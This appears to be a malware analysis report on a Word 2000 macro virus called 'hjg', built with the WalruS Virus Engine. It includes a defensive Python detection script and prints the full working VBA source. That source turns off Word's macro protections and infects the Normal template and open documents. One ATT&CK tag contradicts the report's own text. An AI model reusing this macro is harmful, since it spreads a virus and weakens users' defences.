Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4ad122930c04ed1b…

MALICIOUS

Office (OLE)

31.0 KB Created: 2002-03-13 12:43:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: db396afc13299be0309e1896c7601140 SHA-1: efdb59975af1f8ecd979ce9cbb97733be1f70618 SHA-256: 4ad122930c04ed1b8fd57d6958a3a7252e8227071b79bfdf953a726859fd2885
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a Microsoft Word document (authoring application Word 9.0, i.e. Word 2000) carrying a VBA macro generated by the WalruS Virus Engine (WVE), a macro-virus construction kit; the comment header names the virus 'hjg'. The macro is hooked to FilePrintDefault, so it runs when the user prints, and it first lowers Word's own defences: it sets Options.VirusProtection to False, writes a macro security Level of 1 for Word 9.0 under HKEY_CURRENT_USER through System.PrivateProfileString, calls WordBasic.DisableAutoMacros, greys out the Macro > Security... menu item and rebinds Alt+F11 so the VBA editor cannot be opened. It then exports its own code module to the file 'C:\hjg.FKH', replaces the first code module of both the Normal template and the active document with the contents of that file, saves the active document and deletes the temporary file. Infecting the Normal template is what gives it persistence: every document created or opened afterwards loads the infected module. Note that the registry value it changes is Word's macro security level, not a Run key. A payload routine opens and closes the CD tray in an endless loop via winmm's mciSendString, but its guard compares an undeclared variable (Trigger) against 3 and is therefore never true, so the payload is dead code. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Win.Trojan.C-286' are consistent with the generator's output.
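As a worked illustration of how the behaviours summarised above can be turned into triage logic, the following Python script is an added example; it is not part of this report and not code from oletools, ClamAV or any other tool named on this page. It scans decoded VBA source for the security-disabling and self-replication calls, resolves the dropped-file path from the Open statement through the module's string assignments, flags If-guards whose variable is never assigned (the dead Trigger check), and notes the generator banner. The sample input is a constructed excerpt of the lines from the extracted script below plus a benign control macro; indicator names, weights, the 50-point verdict threshold and the ATT&CK technique labels (T1562.001, T1137.001, T1059.005) are this example's own choices, not the report's risk model.

```python
import re

# Indicators for the Word 97/2000-era macro-virus behaviour described in the
# summary. Each entry: (description, regex, weight, ATT&CK technique).
# Weights, the verdict threshold and the technique labels are assumptions of
# this example, not the report's scoring.
INDICATORS = [
    ("sets Options.VirusProtection = False",
     re.compile(r"\.VirusProtection\s*=\s*False", re.I), 30, "T1562.001"),
    ("writes Word macro security Level to the registry",
     re.compile(r'PrivateProfileString\([^)]*\\Security"\s*,\s*"Level"\)\s*=', re.I), 30, "T1562.001"),
    ("calls WordBasic.DisableAutoMacros",
     re.compile(r"\bDisableAutoMacros\b", re.I), 10, "T1562.001"),
    ("greys out the Macro > Security... menu item",
     re.compile(r'Controls\("Security\.\.\."\)\.Enabled\s*=\s*False', re.I), 10, "T1562.001"),
    ("rebinds Alt+F11 so the VBA editor cannot be opened",
     re.compile(r"wdKeyAlt\s*,\s*wdKeyF11", re.I), 10, "T1562.001"),
    ("touches the Normal template's VBProject (self-replication)",
     re.compile(r"NormalTemplate\.VBProject", re.I), 40, "T1137.001"),
    ("rewrites code modules at runtime",
     re.compile(r"\.(?:AddFromFile|DeleteLines|InsertLines)\b", re.I), 20, "T1059.005"),
    ("writes a file with Open ... For Output",
     re.compile(r"\bOpen\s+\S+\s+For\s+Output\b", re.I), 10, "T1059.005"),
    ("drives the CD tray through winmm mciSendString",
     re.compile(r"\bmciSendString\b", re.I), 5, "T1059.005"),
]

# X = "literal" assignments, Open statements, and If-guards against a constant.
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
OPEN_RE = re.compile(r'\bOpen\s+(?:"(?P<lit>[^"]*)"|(?P<var>\w+))\s+For\s+(?:Output|Append|Binary)\b', re.I)
TRIGGER_RE = re.compile(r"\bIf\s+(\w+)\s*=\s*\d+\s+Then\b", re.I)


def dropped_files(source):
    """Paths opened for writing. A bare identifier is resolved through a plain
    string assignment (X = "...") anywhere in the module; otherwise it is
    reported as unresolved rather than guessed."""
    assigned = {m.group(1): m.group(2) for m in ASSIGN_RE.finditer(source)}
    paths = []
    for m in OPEN_RE.finditer(source):
        if m.group("lit") is not None:
            paths.append(m.group("lit"))
        else:
            paths.append(assigned.get(m.group("var"), "<unresolved:%s>" % m.group("var")))
    return paths


def unassigned_triggers(source):
    """Variables compared against a constant in an If-guard that are never
    assigned in the module. In VBA such a variable is Empty, so the guard is
    never true and the branch behind it is dead code."""
    dead = []
    for m in TRIGGER_RE.finditer(source):
        name = m.group(1)
        if not re.search(r"^\s*(?:Set\s+)?%s\s*=" % re.escape(name), source, re.M | re.I):
            dead.append(name)
    return dead


def scan_vba(source):
    """Run all indicators over decoded VBA source and return a triage record."""
    matched = [(desc, w, tech) for desc, rx, w, tech in INDICATORS if rx.search(source)]
    score = sum(w for _d, w, _t in matched)
    return {
        "hits": [desc for desc, _w, _t in matched],
        "techniques": sorted({tech for _d, _w, tech in matched}),
        "score": score,
        "verdict": "malicious" if score >= 50 else ("suspicious" if score else "clean"),
        "dropped_files": dropped_files(source),
        "dead_triggers": unassigned_triggers(source),
        "generator": "WalruS Virus Engine (WVE)"
        if re.search(r"WalruS Virus (?:Engine|Generator)", source) else None,
    }


# Constructed excerpt of the extracted macro (shortened, not the full module).
SAMPLE_VBA = r"""
' Virus Name : hjg
' A Virus Created By The WalruS Virus Engine (WVE)
Private Sub USB2628()
On Error Resume Next
With Options
    .VirusProtection = False
End With
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
Set FCN8359 = NormalTemplate.VBProject.VBComponents(1).CodeModule
ISA6399 = "C:\hjg.FKH"
Open ISA6399 For Output As #1
Close #1
FCN8359.DeleteLines 1, FCN8359.CountOfLines: FCN8359.AddFromFile ISA6399
If Trigger = 3 Then Call ELA9086
End Sub
Private Sub ELA9086()
mciSendString "set cd door open", 0, 0, 0
End Sub
"""

# Constructed benign control macro: no indicators should fire.
BENIGN_VBA = """
Sub AutoOpen()
    MsgBox "Quarterly report loaded"
End Sub
"""

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        r = scan_vba(src)
        print(label, r["verdict"], r["score"], r["techniques"], r["dropped_files"], r["dead_triggers"], r["generator"])
        for h in r["hits"]:
            print("  -", h)
```

The dead-trigger check is deliberately narrow (an If comparing a bare identifier to an integer literal) so it does not fire on ordinary code; it is a heuristic, and a variable set only through a Sub parameter or a Public declared elsewhere would be a false positive worth eyeballing rather than trusting. When applying this to real extractions, feed it the decoded source olevba produces so that attribute lines and comments are present for the generator check.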

Heuristics 2

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2218 bytes
SHA-256: 15425e1680d84c74addc0cf1a2dabad9a44ed104acd43c22a5f2016968b451d8
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'
' Virus Name : hjg
' Virus Author : The WalruS Virus Engine (WVE) Random Virus Utility

' A Virus Created By The WalruS Virus Engine (WVE)

Private Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Sub FilePrintDefault()
    Call USB2628
End Sub
Private Sub USB2628()
On Error Resume Next
With Options
    .ConfirmConversions = False
    .VirusProtection = False
    .SaveNormalPrompt = False
End With
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
WordBasic.DisableAutoMacros 0
KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
ActiveDocument.ReadOnlyRecommended = False
If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub
Set FCN8359 = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set HPO6156 = ActiveDocument.VBProject.VBComponents(1).CodeModule
ISA6399 = "C:\hjg.FKH"
Open ISA6399 For Output As #1
Print #1, VBProject.VBComponents(1).CodeModule.Lines(1, 0)
Close #1
If FCN8359.Lines(1, 1) <> "'" Then
    FCN8359.DeleteLines 1, FCN8359.CountOfLines: FCN8359.AddFromFile ISA6399
End If
If HPO6156.Lines(1, 1) <> "'" Then
    HPO6156.DeleteLines 1, HPO6156.CountOfLines: HPO6156.AddFromFile ISA6399
    ActiveDocument.Save
End If
Kill ISA6399
ESR8101 = Int(Rnd * 44)
If Trigger = 3 Then Call ELA9086
End Sub
Private Sub ELA9086()
On Error Resume Next
Do
mciSendString "set cd door open", 0, 0, 0: mciSendString "set cd door closed", 0, 0, 0: mciSendString "set cd time format tmsf wait", 0, 0, 0: mciSendString "open cdaudio alias cd wait shareable", 0, 0, 0
Loop
End Sub
' Another Virus Created By The WalruS Virus Generator (WVE) Version 1.10